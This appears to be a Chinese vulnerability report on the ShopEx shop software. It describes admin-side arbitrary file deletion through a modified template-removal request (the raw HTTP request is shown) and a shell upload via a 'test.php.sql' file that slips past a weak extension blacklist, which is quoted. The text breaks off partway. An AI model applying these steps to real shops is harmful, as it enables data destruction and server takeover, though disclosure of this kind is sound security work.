ShopEx前台SQL注射拿shell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 我终于知道ShopEx是干嘛的了,蛮多店铺用的 比昨天拿shell的方法更为简单有效~ PS:前台拿shell & 后台拿shell & 后台任意文件夹删除 ### 详细说明: 0x1 后台任意文件删除 在模板列表删除其他模板,用burp截包 ``` GET /shopex/shopadmin/index.php?ctl=system/template&act=remove&p[0]=testacccc&_ajax=true&_ss=goods,setting,site,tools,sale HTTP/1.1 Host: 10.1.1.100 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.81 Safari/537.1 Accept: text/javascript, text/html, application/xml, text/xml, */* Referer: http://10.1.1.100/shopex/shopadmin/index.php Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 Cookie: ********************* ``` 将p[0]修改为相对于/themes的相对路径 0x2 后台拿shell ``` function check_file_name($file_name){ $black_list = array('asp'=>1,'jsp'=>1,'php'=>1,'php5'=>1); if(!$black_list[$file_name]){ return true; } return false; } ``` 上传一个模板~ 里面添加一个test.php.sql 貌似你们没有听这位大哥的意见: [WooYun:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息